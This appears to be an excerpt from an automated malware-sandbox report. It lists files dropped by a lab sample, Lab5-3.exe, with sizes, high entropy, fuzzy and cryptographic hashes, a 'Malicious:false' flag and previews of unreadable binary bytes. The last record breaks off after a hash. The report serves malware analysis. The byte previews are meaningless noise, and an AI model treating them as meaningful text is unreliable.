                                                                                                          Preview:.A$....?.Z3m%.H.."&....H.p..P6.x.O...B.s...m...g7.....~........5.n./...n....F...>..sMH.<..E..5..`..yR~...R.......^...mg.e.2.3.J..zK..o.....X2Yb.C....y...O.<+H...wR.)K.0."...<..4.a..9.RM....[...h..J5.uo.N..z^x..pUt.....s.k.S.1U.zV.... Q.`...#..l...].HF..$.}.f%.(..G.9...WN...a........y.W.kc..{.R.5.a.P...|.T@.Z......d*....z..D{....a..qk..^j......t....R.-.I.(..K9U..b.w..R......w....<.....GDL..(..[.8F...K.V....d..n.._.r...-....<..QFM.mD..Q<:.k.wdz.a...../..x;f.lU.\...\.N.y...j..uK..-..V'}f9...-..ER.C3.#-.P..>.V*...,..G'&.b.......,..!.....>@...`Q.U?.j ....O.E=.....e....bfM....5u.g..u}.WO...d..H.p.h.o.F.Z.2..ZFd..KkE..O. .w..x...O|Rzb..-..8=v+.o3..3.....%.%.....&xe.>".7..<....U.#.BKt9.[o..O..B.....!#.I.!....A..4c^..Q...b...$<|d.M.'..Qy._.W.`.....7.xO.C..L.....e..ItW...YZ...B`....q.p.w).d.&..q..9h.&?g)..@73mM.........PC.....v9.j'Fs...Al..5.r..%...!.....E...@.a..).T8.lA.{...+x.........t.H....I...*.i...DI.^d.26..+....H|.?=#.@r9.=..!.Xb2.....NvL..hL.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.914833642006607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:y4Beq79UlUdwmtKmGuaGyKg5VJtqPFo7SHfUTid3hBaUoSGFcmeykEdEElU92i:ySrDtKlag5IPu7NGx0uKeY2ElUJ
                                                                                                          MD5:0D7D6F95772F02AD6FCB286E0843CD37
                                                                                                          SHA1:ECECE1F8344711574257588E019F8D5D57289106
                                                                                                          SHA-256:BF1D9D1F634AE20CB7C8DFCE2EA3DC995B8DF55515BDAA561FCF6300A0E44E24
                                                                                                          SHA-512:0EEE667BFB679F5C14B44F6A3F0D558AB8CEE61ED9E866C01F0DB28752EBFC3E3991098ADF5E6ED61AD8B7611FF1356279497BDD5CD25C75A2C4CFF98937A6BB
                                                                                                          Malicious:false
                                                                                                          Preview:...0..84`z:...)....kx:..p,Iw.;.@zid...182p...r..\a.B.m..[..,..B.A01>.....nKWD. ].F...#.Q6W.o..r.].4.)B...&..fU<..#...Q...D.z...~I#.T....P...q~....=9....$..pTp!s.....a.BLD..X....d.<I...t..fV.../........-F..yT..@.....q.%5..wc.*...z..B1.a......Z{!..%..ii..D.....U...5.K.X....\.61.......U3.W=.zg....-..*...iH"..k.{...=}B.(...U..l.X..f.o;... 8b.H....d.@g...U...&.iM..h .J.....v...N...nb'.2..n....)&....$+M.....%.L.B..,..*\BT.2.a..Q1.dM.#..$Nb$..:`.W%.=..7.Fy.W...d(U!7.$..}.S.......wQ.lh.....h6...G.....x....-.A.t..CecfT.!.,.P..I..........*......N..Ym$......Y...3|h..A^.jE.{.J@.J..B.....e....4..;.E+.2fhOrw<.C.p..d....kh.....e(.z..E.e...o.x.*m`....[0...(f.9..|...',.....Y.l....}.BE.s.$../.75j.H.,...\.....b....'..2.G.:......0.2<.D.....'.o..c...?.1].|PB.2.....X4.qTF...P...x."y].......j.k..\.j....K...%..w=....Z...%9..C..B>MyPF..7...*.%.F.x..?.F..r.2...R..-.....Cl...Nk.*...e.;.$..>.....D~I{..l.7.,..=3..w.......`...0..q..,...<..FH..yV).-.ggl\.B34f..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2640
                                                                                                          Entropy (8bit):7.925983471063088
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:pkMisrSDZDjb5j2TmMVSCDb3niHfUTid3hBaUoSGFcmeykEdEElU92i:BCmTmMVSCf3ndGx0uKeY2ElUJ
                                                                                                          MD5:33099921BBF273827D42E50CA8292268
                                                                                                          SHA1:6E9E8ADF9733C11E4251D9E89A99FB74792BAE98
                                                                                                          SHA-256:F3C745169F4CD6F796C1749E98C0AACF7DE7E033C6AC183E690FC7DCFE4A2EB7
                                                                                                          SHA-512:958FDEB38B632A8B507F677831E517F9B7A254F5E5D83425819B6703A758E6BA454B277B4D9B0A14AE8285305B41605BE08F254A38416C04F8CC73EC4B00589B
                                                                                                          Malicious:false
                                                                                                          Preview:.&.z.x.._o6!....,..f.0..h..d.L..B]....l.j-O.3...@.@....H.ft...A.9f(...<..4..(..../O.r.A.ORV'..$..XH..Z=.)v.V...C......+.j...a.........8U..yx.R.>"...9./..B...p.;l&.'j[.. k:.1..bfmB?...k..;._...H......,.D/.Z.^.u..|.bno......s..k..9..-IE5...]....>.a=.V.....KwgG.h..EF..-]2....7..+X...U#.q,..CI%&..k4..y..9."........r2G........L.JX..~.S.O...L.5......$..t[!#.....(....|.g......Q.j+.B....r......5..).r...YlBxN.,x...?.1....&....E..'..f..m..(2.*m^.....9X....en....qw....Wh...C..E..2x..v}..s......'..../....a...H....`.,.....4C....k.,.,..O......v.o:'_.vi..z.S.Wap.J...y........p.d.../e..zq....As..N557.}E.:..I.3.z2.....F....H..x....,kQ}.4...3....C...A......Kb8H..FI.......o.5.#.SQ...1.v..V .X....8NP..t..0.....BN....ES.VFH....V!...gc.Gm.o...}....J..=..>..:.W.Py........r......-.....#....Dn{....~*.+..K.y4:.\.+....f..c...,...#6........e.Q>]D...*.AwM]G..-...}MQ.v..4.rv...y...N...y.&.n.....U.0.B.V.%IkP.&..+eFm.R"..b.Y..m.../.._5...V..y.f ..n.;..W..f.uI..}.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM, 0x8C-variant)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3328
                                                                                                          Entropy (8bit):7.949491700847661
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:drKbw7A90xrE3pDOlbHgRK9D+Gx0uKeY2ElUJ:dWw8KxY3dOVGIt0Cb
                                                                                                          MD5:05C19DA7E6AC495C878CEE193D3BC73D
                                                                                                          SHA1:CC902A752537E4CA9C496300CA7681E0DBC6A723
                                                                                                          SHA-256:66003E32AE69F83C1514279604052F1EA53E7074A8B49B67E91BA29190CB7032
                                                                                                          SHA-512:AFEF24890E271F73C5872A96BDCFBB2BE512A92CD2381C71A3D25DB3E1D75C699EB6186A09FBE81913C4FD6CAC12FE19CB622C060A83E7A901D6691A8EC376D4
                                                                                                          Malicious:false
                                                                                                          Preview:.. ..Yxw..]\.(T\..P..&......fG..w....N.....)&2.gYU2..8.Q3}...u...Sv.../..V..Z.......O5.[..'....<..p.h..Z....%9@..>..;>nj<<g.*xe...P...-...lua.{&..$.......:......ei.8......W...J.=......&.. .).....[.V..e.."<....h....h?nOF....Y1....^..1.2.yPh]....C....1/...?0.O.5y.[5..G.."..#>."..X....W.../.?=K...\.&x...[....I..d.?"....M/,....0..Fp.....b.....y.....Q...s..:."....3...V....cD.@..Z...&.Z.....y...$v[>}a..59 -..........5."."..97....b#.......+s.B.>+#...p...3i....0@....?..q.5._....i..@.....l.IX...c......Y...Q%..K......N,9.vm.L.ly..5..u....I.....4.0p..D.5...p.LS.'].#p...rV......]j...........-.V...H.......BQ~/...b...M.(......;....Y3-....po..YE.....9..A.....|.L......:*.E...'G..0.......h.6;>.....#-.......:d...._.|....=.!.GT..kt\.....B....gm..c$.#t%..xe.y...`9D8.S...K.... ..Kr/..FU}.,1A..n._8...)...01J...>D..^.1...aS..'......5..|U..8Y.qs./c]l...).....''....k.*.o.uCd7..D~$.N..AT..,6..}6F.........f.M.%X.&1..2.j.r..p".....01.YKV..0.KmYs.9L~.G.`H.V.r..B...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.948070339845481
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:u4mGr4gZYRyalSPNIORZXNjjvoGx0uKeY2ElUJ:nmAIRyBNxRZXN30Cb
                                                                                                          MD5:716837C8EFEAF4A62F36F0E2A475EC72
                                                                                                          SHA1:BAD5E61DCAC5FDC65B832EE5A5B75245687D168C
                                                                                                          SHA-256:54C5D7969C2479CBC1B1A478FC275869979D816B01BC9193FE921CC0C6301FD5
                                                                                                          SHA-512:A6E785E7C20A8ACAFB3D5EE3ACE7336709C07A4C7149B1BF2D4F867692427F174C6BAB07537F993F7E792ECEAC5ED53DE5149B972DF34BD0AC3FEB4EE2CEA210
                                                                                                          Malicious:false
                                                                                                          Preview:.0U..{~...`...v..0}gmM.O......a.xm.R"....!&..C.c.S.B|.D......*..s..D..qd.o.*3"m....M.z..x.l..T}ct...W............%i;..z...Gb?.5EF+..qe.].?+\p....'..w.z,.|.F...._g..7y...Q8......`...s...R.....=...V.:....g....V.I.w...R.1.UPo.C...Y.......7*...y.ws.?..w.l....! J.....T.yW.E...<+..5...?T.F4.f.gnr..T...\U....0....}..._..C.._......l.E.D....T\.(.!'.|.{.W0..&)....-.\..BGm$...@....(..8.X.Q.@d.G..S..T.2..J.q...^).L.R.L...Dn..a].6....i`..M.~5?...X....B..p...f...R...+....'.O..>,...m.,..\....L.Q"IB..j..:..v.M..m...V...`.....b.2T.'....c_....".13.&......;..?......'.>........"b..:$K.._8..}.J...A.Lz.I.<k..<........W%.Mh.:~..c..y.a.;.$&.\_...g..X.i..M.w...C:.t0... ~o..D..5....gm;....<.88..55.!ab...Zi..#.6cZK.h.SX.*MQ....g..C..'^.G...$I.G[WMo...r,mr......g%...g..l....m.K.c.%.....$.tr+..&.}.ayW.>..k..P..vw...X{.@j4_7.O..)z......Y....!u.8...0Uf&......r...!.1F..b}....<..U.%.4...5\...q..].<..._..........-G..i{....G.K^..GG....y....L.2#W6........~..8...?...P.j....0;&..R
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.948054147042571
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:MIR6wwRZSBeSXncBeo1wWle750eCGx0uKeY2ElUJ:MI1USUXPZ00Cb
                                                                                                          MD5:6FD5B50DD567EF965A36E7DB05D507CB
                                                                                                          SHA1:78E11868BEF1B4C56BEE4C0E63A5253A98002974
                                                                                                          SHA-256:867CCBB318BEB6904A5960C5744F51950DCF4CD8288C1C98B8FF7D1F02972879
                                                                                                          SHA-512:76A7F18FCC83D354750C34097BBFCF411E77E4270499741B76A1FFB3C954C641E5102337780646B3142DA41896D747BE5AF80EDD064B7550A8021A025083D451
                                                                                                          Malicious:false
                                                                                                          Preview:aw........T.,.a.E[....xz.+.#.98.ZU0.....{..O...S.Nu..+.....KL...%...).wDf{...Uh....F.WRv...:.%@..'j.O..r.%=.."._c...-.$.x.a..i....H6R.f.+.,.#=.;f..'.q..-....s..(...]..L2.1!=..}....{[....BR.+.s..J...Y.*?..l...<n.D.^...2.t.G.b.1...MroMO....>.Z...l'd....yO.....PaG.*..._i./.......0..wqo$.)........ONv,crC_............v(e.m..w$tN......g~.2Qa..V|.*..c.K......k:.c.e0...u.E..2....|-;.;.x..g/...?.....{e.....Ox.;/$[.,.....(8p.....n..2..r..u.i.t..L.....@.j..,.-..4!...f..l..V...FN.3G.....z.!.R>...0Efm.}}..#..dg.f....E....%..A..}..].R.,...E).rq.....?\#O.>...!m..oyf(.0%.9..B.:d`./..g.......c.f/.OnD....e.g.)5.N..K.).4...M!..XyW...C.'.......~.>....R........{.6..j..w.;3..-.92b-nwS.6..0...s..f*}...8.;OQ..2>&...0;..1..Usc..=......~.Z.\E..!....U.Kb...4.=&.Z..c5...8..U....E...o....d.U3..Q...<.b ..Q.........,....d..9rD.....p.......P...'gP9"..7...:o6.LM...~...u.J.Cfj...P.\..~.....rz..q...Z...}J..QuzV..qGo..Ve.H\./.#.....f......Y....q......7...+{z..;}l...J..3W...{L..o.[
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3456
                                                                                                          Entropy (8bit):7.949703148183129
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ChyXs/Itmfm2SxjEJ4gCI8Gx0uKeY2ElUJ:ChNym+H4JRLP0Cb
                                                                                                          MD5:C3DB51D623D2E88C5DEE4A594C33E8F0
                                                                                                          SHA1:370D11C4A0134B767F143C3DFFA7409A7C12CF86
                                                                                                          SHA-256:03035CACD774D70C93D1DBFFCD325B8110AFD35118530EEAA8EAC56F5C1A5F1C
                                                                                                          SHA-512:C548EF37135D15F65D05E0307791B1B996E1FF788585E9A6F68958E71FF0CA549DD74BA1FD6F74B587866D90897E6D9F519BCB9720AD4E3AD2041AA2231DD376
                                                                                                          Malicious:false
                                                                                                          Preview:..]j.D......v....p...............D..v.Q..9.._.i..3...!..{._M}....Crg........7e%..).)|M|.G.H}3)....D.?...0..f3......\>.}.\y..".u......W.t!0.W>.9.g.>....XJ.....G..V.]C..uO....g....y..s.oo{..1.U<..po.Ph...@..00?m...........3...,...t......q...!..s.N...yz9y.......H3l$.|M..e......7;.^..l.P.L.vZ.Lc.c.K......rEp.WO.\H#+xo.T.P.K.IH....E.kd......e...e....e.;..@.z......l....o%..n.u.<.}Z.h=.}...&ETz...*=..lm.x......>....H..S...G6...B.f.........$.. ..v).../....*..=....;...H..........&ir.B..J...a..K6...q+.j...Q..U,..J}...[...s........h5'}...M......}..x..;...s.cez*.@ o.(...;...w.)mn.p...k..lt..'.0$..,.]3_.lHa.k..x......e8+R:...i.....i$.]w.#..7...$......q.B..i.[$fj....+q_.A.r...^M.<.y...T..g:/8&..BA.(.l..hD....?...F:.._0.|...wz...a.7v\8.;n$.R>...f8........@ .H,A.M#..{p&..:.r[..S.B....H.4<...~h5]0.dL....c.CI.{.KH.....S..L.f..G.....L......ylF..6.i.[7SH....%...........|/f..T.........t+tzF*R..........D.9../..}CfL%.P.A<..g2....H]+...RY..f....^(T.Bo
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3456
                                                                                                          Entropy (8bit):7.949297917583731
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:RCXGZYBOzkMfbNX1RR6GsNGx0uKeY2ElUJ:RCWZYBOzkMfhPIn20Cb
                                                                                                          MD5:173A42845E89B03633F60FC265C23708
                                                                                                          SHA1:46A5A91FDCD38F12E7913E3574F223BB525989DE
                                                                                                          SHA-256:46F8F09129EA0E929AE567992316C34A17413F99249B9F6498D95D1C8C2DB54C
                                                                                                          SHA-512:1E2DDD24D3502859434A2DAB2F250787A75D92E22225A0058F8115C43CB9AE374AE70635682E73103E8724A4928DDCF72E267F1E37FCA561397852B21371CFE5
                                                                                                          Malicious:false
                                                                                                          Preview:5...C]....H.C.t...r......"...u}.vI....-.p/0.....7...G....)M.....<.u.....<:pK..@...G%..AB..y......?.n.g..I.WF.s.x.....u.....e.-.YD.0..J...f...RS...\...h.K[+...d....../kYl.B....@).%.v&...6".Uq..w...X;WB+..s..d*.....Qy%.......T.h..>.1...F?.!A...KH...........F...0u..O.Sa.......J`k....L .(...1..;.........n.K...Gk.a1..R.JL.\XMa..|t86.oEt.1.X1......'....2.;......f.4.....s.5r..0g'4..^....+.V.I.9...C.B....z....m..{...8..%.ST........h?.W..+......'.h....%.lQ ..j76+...#..VST`x..".L._Ij..b.O7.h\.8...c.Or.)....m...9..:a.r.7..jfE....PSq.m. *..Ss_`Ux....(.....S....h.<.A.R....t..5..M..+..j..i.z....t.....kOp.\...o.!u-...D.9.x.np.+.._eO. ".}.....7.t..b6..X...j3....x...5..N....`...$...S.9U...{).p<........T......X..I.d...F"+oQY.|.?...Q7..0..u..F#Q.....v..4.<..$$...i$....p.m.-1../....<9%z......w.....H.w~..."^.v..u.+....al.)...F.t.s...=..&..>... .h.L.z.~.(.'.....z8.=:... $.....lR..#.e.x.{..!........B..v..AHlys...~S@.m.:..ZBNs..._P.%..o...k....UB_?|..'.t....Q'h......G.Z.E.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.942860570965345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KmVIWq9u/f3hNu+aypfqwpt7udgtWtHHfUTid3hBaUoSGFcmeykEdEElU92i:TVTq9uLJptBYtsGx0uKeY2ElUJ
                                                                                                          MD5:F19DFE7D68741BB5C3AEC3DD1DB63692
                                                                                                          SHA1:44B5DC87AA4D79B429B96FAC592458A361C638DF
                                                                                                          SHA-256:B9DE43852F71E2A092AAEA7A9F3BF047EE6B9A98C2303657BD033A8AB64B96B2
                                                                                                          SHA-512:28C15CC94B45A3713734FC72F112F6065F330B1B8083CDCCD165758D34DE385DDF1AB790F8923BE9B681613383FA7C0A4085DCCD69F159EDE63C966D3A842D37
                                                                                                          Malicious:false
                                                                                                          Preview:..dB%..8..q...*.Z.J..~..@w..O+.ui.*.....ibv...I>..m}.*.OR...O.3....C....q.#..f%...Ey...Xd.......X![..r.~...j.M-.*...,...8.........c<L..K.q..6..Qcs......)[ .....a..>..9...5.*x.R.Dghs.......N........`.i....-.T.`..%..3!......Z9<m..y..._..eZ..\.Q.rW..p6.G.......t[?...px.G..)A7....#.....\.3*.C.........4p..*.8.V.j-E#...6[._...a..p....*$7:.s.f.f..Wt....m....SC.........V.tO...U~hd..EK,X`.....P..... .5.$ .......Fb........O.f}A....;.y......ya?).cs.>..d..6....1R. .4G........Clx..F..Dd......u..t!EkY...,..{..JC....1..../]..6.....Ls..x.|r...E..?..l.l.5.....L&|s..R...r.?..a>J...!*............m.i......j..c^.B.~..%j.s.......'..75..l..../..z.?.:..?BD.../'P.|X.Zf@4.4..U.4..~.j.(..4}p8J...9..bM.;.61..{.h.....P.c%.fVy..A7a.bg|..@L.bG.$q....@6{..TU...P .9.Pp...{..W.\..E7r...\.. #^.9.'.j........F@...B....a.<..S..~}.=.k..@.:...{.h.0..<dS...[U...G{0.....-..*..1.....:.....eW%\..e.....|[?..~ sN.:....'.@.R.%..a..d.j..=p..<U..t..s.4.....v.N...C....Y<..{14....$.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.919555456150685
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:aM7nfLYBypqHZBHfUTid3hBaUoSGFcmeykEdEElU92i:ZzQyg5CGx0uKeY2ElUJ
                                                                                                          MD5:96F9AF7FF19883A5B9F22C5FBB81E01F
                                                                                                          SHA1:DEABBAC948316729CE9E15F968790EB52A024A55
                                                                                                          SHA-256:C5797615A7F656C4F111F222C8269DD504C8065C0E1F2B19BAF2691CC6FB6EF2
                                                                                                          SHA-512:083644762B92D2CDC176C63019485E2F079E84AA9D0BB944948B02A684B9A24543D7B8B283C0BA98F8578FD89B685F32127310490DABCD22BCC976924BB89EC6
                                                                                                          Malicious:false
                                                                                                          Preview:2...+._..i`fNW.qBp.H.n....A..U.o....UZ..a.o..}P.4Cls..;!..K..c7.B...VC.f...?..6...l.;...3..l..R.\.q.1.......Nv.....P..le.0.......Y..A..7..[W7...=+g......i.d..Y.&.5..R......u.',...Ng^..)j......,?...c._....t.*#.........4.I.C......J<z1..7.&..Vfpx...W0..j....U....g'H.x.B{.....Rx..:.....\.T.3..Z..V.....c....EQ.>...-.P...2J.Z.G..=..k...(....*.E.N.....n..c.f1.8...s.p.A.,61..Mv.F.'%..%/..H. .*.yu9.QH!!....wD......_JP...+*.....{{..Qh.d..v.s.H|$......V....5vqs..b.q.......+..%..%.....gF.lf.y...!..E#...a."..v...........4?.:..w...q.:...6..4..<Sg.....9:.p....x..........M.C.Q..'m..).j*...@5..G.>.N].. ..i..C..=.2Ev3<tr.).t..mX{RQ...sV....r............*..{..r..........L.....i.o..}%...$'.E1......c. JO..+&..4r.-B!.:qm.'rD.v....,.....?..O."......\.Ez..R....D......s.`..$.{F._..{..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.907941211675622
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:imm29EuEEG6pVeHfUTid3hBaUoSGFcmeykEdEElU92i:iUbxGx0uKeY2ElUJ
                                                                                                          MD5:A60D5BF66AA1DC822CC4B938FCDA13A4
                                                                                                          SHA1:BF68BCC1CA883119BE40CC51A9A1FA8638CF6563
                                                                                                          SHA-256:EF548C03650057CD08FE011529CF93EB1E8DB62E3843E7A7EC3B64C6FED0862C
                                                                                                          SHA-512:97A4F58636DFB271F3DDF83B885FE1055F2B03CBB93F1393233DDB00C0012924BE37140DCD14F15B2EDE39333EBE29C23B37DEF95AFC024BBE18561AB2D68F20
                                                                                                          Malicious:false
                                                                                                          Preview:<.tT...@.E.d`.PM.O..$h...0.'.f>..L....E6.t....X.A.s.G.l...i."..z}l...n.rF.h.h......".fc....Z.Z.D[Dk.Z.X1..M.:$C.,....t}7..H.".8.......W..g..8...b)S...b.......!..$.O.s..-% .S......w..g}...-Z..Ws.>...F8....OXs..W..El6...wQ(.O.mp.b% u7..C.bs.O."....|..!..Bm(!...E.=e;...6.r)..J%E.N../...K.d4Q....m.q_y.o:Z....~._....+.2`..H...X..}Q..C.:;>:.x/`.......N5}..U`..^.aE.../...R.c.Y.)O.5_J"....}.3....c...52]...G2}..Q=.6x...F.s1:-e..FcJ.(..z........c...%.4...0[...n...E7F.......0Y+.J..H..%.....W.1.....*.w?.Y.z...N...y..)..%C.}...G..P....g@.2..m....Q..%p.o..h.;T!...a.%..#.7.|.9..'..ds.j...jl..c.D.@.E.v......+G...#..v....q.k...$'M_..A...u..{.....}...2.X4.....;..\~.;..h.`.c.;.x...2.$R."qit...,..Wt.,..QU~.. 6...QK/.t....Sz..c...0.].l..S....V....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2432
                                                                                                          Entropy (8bit):7.919287502381499
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:/CSrxCClJ91vDtJy/gWv/bfAhfBNw0oko8HfUTid3hBaUoSGFcmeykEdEElU92i:qqvv1vDe/DfAttok2Gx0uKeY2ElUJ
                                                                                                          MD5:0568286F226CDE86065EBF35D7FA1267
                                                                                                          SHA1:A508FF965268CEF111205292BBE2CC321851C81E
                                                                                                          SHA-256:547102DA2920BA48D96345D7AB91BFCADB05D470AC85EAF476592559D87817A0
                                                                                                          SHA-512:685AC544959DBF1963B38F40E19B6B12DFDA4941954A85E10090717430594C112F9AEB7FE1A6DD27FE1845D9706AA97F4F4FEC233A951F870E62025086641F13
                                                                                                          Malicious:false
                                                                                                          Preview:.!2.gj*......O..$..T<3?.=..VK-.0..5:?.......>...v.....6...Y^|T.9YWl.=...QBS.k...8..+...|....g.2.U.E<.t.......:.U....b....J.......$.U...-.&...O.......=....G......e.*{*.L4......F..1.BE..4=s.c.-...]x.....%.y$.......B..V..W....F......v..2.+|...=F.....Tme...B&...C...G..9.>.J...........:U.gj..3....9..:;K#....l.......~.$..J.....@.#....*.w..4..........9.F.f..<....F(...H....Xj..&.z.-...J..]q.:.A.-pV$.....`.;.E..j>6.L8.....k......$dl..9........m..E......hDu.5?-}.MM.\.>~.Z.*..^.7...+.-..v$%.....Al.G7...CXB^. .Le.!.b..U!.7............[.yc;Xmse.,l...E'..h....0.7...B..}o{!.5..v..1.....XgV........d?VJ..jD.......X..I...-..K...1.#D1...o...T..2...#....{.q..x......A..8..&q8.O.i...............)?.{.Ox.a`Ut..).......(......W....1.*a......=m^...x....[>.[.....d.........(....".w..".W9.`.vT.Hp.Gl{L}.t&..0.y-......'....W.t..+.......{.[..I?K...D.Y.Q.Hb.J$.z.z.w.......U.h.-o...5.'.*....r.iV,...yh..g...2B.b...F....&xk..ds.G'.......fX.......0.'l...|.x.gY..7S.T.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2944
                                                                                                          Entropy (8bit):7.926752297247177
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:rYbRiSpaTpKd3ewKRC8AzBLqVba+0DPR9jvcf6MHfUTid3hBaUoSGFcmeykEdEE+:rEhee8YB2V+9pGx0uKeY2ElUJ
                                                                                                          MD5:86DA31420E61B21918E7285052B8FD62
                                                                                                          SHA1:A8E9B7ED2103AADECC66F3FB27552699E549A9CE
                                                                                                          SHA-256:E1D0F7B98212093D9F68AA1DF4B3B3953CA7BA90D508847137FEBA75B78CC511
                                                                                                          SHA-512:4EE900616E8A651C86975A69E8B12ECA576C971F22C5A0F337A0A7CE88FB7BC5359089E76822BE1C09A91ED96B0872EE7228120E917235A9368A50B3A5DBFBC6
                                                                                                          Malicious:false
                                                                                                          Preview:v....@+.....%....v.)3............W..Spm{^.HJ...Q0.......O.|.m.RM./i.v.^...S.....C..2>..d...+..u.H|... P.8X.Z...j.Q.....?R.A..bN\...~ho...U.u?`..U].... .1.)..{O_/'....y....B...f&...D.k.c....,..{.h......T..._o.-....... )...d....XF.=.8.O...y..A...%A..M'.e7.cY.3H.O.l.9.[...$.]o..~.8....@...............H....$..P"..UC..~..vnd{.. .%..VQ.{hL?)_.o$0;....U.I...D,.<c..4...1....k..9..<x.u.<..$Y.7....D.&..f.l2...x.=[...|.v.....D......e<A....#;.=iM..7~..z..Ik.&.P/fr%..)?..b....5.~...A..x..0.^)..U..aQ..D.n/.L..Ug......."..........7..?TGd.X,....%.[.0...T....W...{..{....r...3.G.tK:.Ctg..ta.1M.#.J%...Gm.:.8r.=..jMr.,..^zJ...:/9..*.._.6.q.S.m.C.L.....t.......d...NNI,..._./.'R].p....[..Sn.KO.....mw^....a.y....<r^..Y.D.#..zw.I...SIl....H......:-...W.T......J..Q}".9.N.c[........i.l0.,..HNg...\3)t;h..!.n......'....*."..b..[..x9.....?B.X...4.k.AO..YE.^.8|...bv.T......C...A..6...q.l2..J1.)e:.U).!..@..TI^...-..#.;vpd]!J.".....V.}]..b.....eO..c@..w..XxcU.D.I.O..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2416
                                                                                                          Entropy (8bit):7.930240407244418
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BrlZ5no9MyoYZ6GctkHfUTid3hBaUoSGFcmeykEdEElU92i:5lZ5noaix2jGx0uKeY2ElUJ
                                                                                                          MD5:C00EEA4B0E72FA8B41EA88B1E3917387
                                                                                                          SHA1:D36A015EECD63942C487A26B007E493F8B458C37
                                                                                                          SHA-256:8AD25299F9ED875C5E4D5C3C8F2B33D47A7D30D9BE8932AE78799EC04A89C642
                                                                                                          SHA-512:F93FCD8537DB10FB1C9C36F793707699E9B073122F6E97D9B09D61A9AFEEFFDA8E2509A2587CBB04A0E6F9DD806EBE69CECB8E020178AFE5F404892448B05B38
                                                                                                          Malicious:false
                                                                                                          Preview:(.9irs......V.d.EN...;..}6Ns. ..P.$H..a..4.G.........".7.9G.b..K.I..x.>..>.5\..t3fg..u7_Y..I...:&UDt...[Kd2..0cP.5.Q. .4.'....g0a..{.....tV.%..._h`.w8l...UO......:....|....\.YS.T>d;.IY...bL.|?/1{."..MYX....m.!....5...*9A.Z.....=....K...`zxx.wa....q1..w....Pz.*.[.f....o....^.S..Z..B.......(.n..d...Z .Pg.u..v.V......` !5....:4..9x..E.Dx<...v8r@..^..k.R.k..:.@0....0/..>.....t[aN.z....S.........J...@......s..[@G.h..%J.R..7.?... ....4%...|..)ym...`F..K.,b.....^uNp.L.Q.N.....C._..c.Z..........EA...t....*...G.}.p...{.<w...C.'....n..:o<.a.5..#.0.....S.......g.v...eU.S..n.....8.Me..8 .j...U.......S.\oc.....kK.X.`#./........1.S)....C........nr..n....+.0....x...^'.....f~.#f..$....#.@.bY+.[.I..B...$Q.UR.M.CH9t../N...W.4..`r......`..t..q]O.........%..0X.BU.k...f.4I_G.c......-...3P...((.2E.?.:...6.1.........s.......QR.Y....{V..Cf."..(h.....q..{.B......Ful.,...........(i..........x../..p+j............z..lR .<l.../.[.UM.;.y.>........z..M..j.n\...x
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.944849899648532
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:B45Z066MQB/ANodHs57mDcYUGx0uKeY2ElUJ:S0AI/A2Hs57FE0Cb
                                                                                                          MD5:E616FA4A37FE991D4059F8A200146E72
